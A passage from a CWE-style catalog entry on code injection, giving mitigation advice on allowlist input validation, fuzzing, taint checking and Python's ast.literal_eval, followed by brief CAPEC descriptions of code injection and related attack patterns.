  • Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.
  • When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue."
  • Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.
  • To reduce the likelihood of code injection, use stringent allowlists that limit which constructs are allowed. If you are dynamically constructing code that invokes a function, then verifying that the input is alphanumeric might be insufficient. An attacker might still be able to reference a dangerous function that you did not intend to allow, such as system(), exec(), or exit().
Mitigation
Testing

Use dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results.

Mitigation MIT-32
Operation

Strategy: Compilation or Build Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation MIT-32
Operation

Strategy: Environment Hardening

Run the code in an environment that performs automatic taint propagation and prevents any command execution that uses tainted variables, such as Perl's "-T" switch. This will force the program to perform validation steps that remove the taint, although you must be careful to correctly validate your inputs so that you do not accidentally mark dangerous inputs as untainted (see CWE-183 and CWE-184).

Mitigation
Implementation

For Python programs, it is frequently encouraged to use the ast.literal_eval() function instead of eval, since it is intentionally designed to avoid executing code. However, an adversary could still cause excessive memory or stack consumption via deeply nested structures [REF-1372], so the python documentation discourages use of ast.literal_eval() on untrusted data [REF-1373].

CAPEC-242: Code Injection

An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.

CAPEC-35: Leverage Executable Code in Non-Executable Files

An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.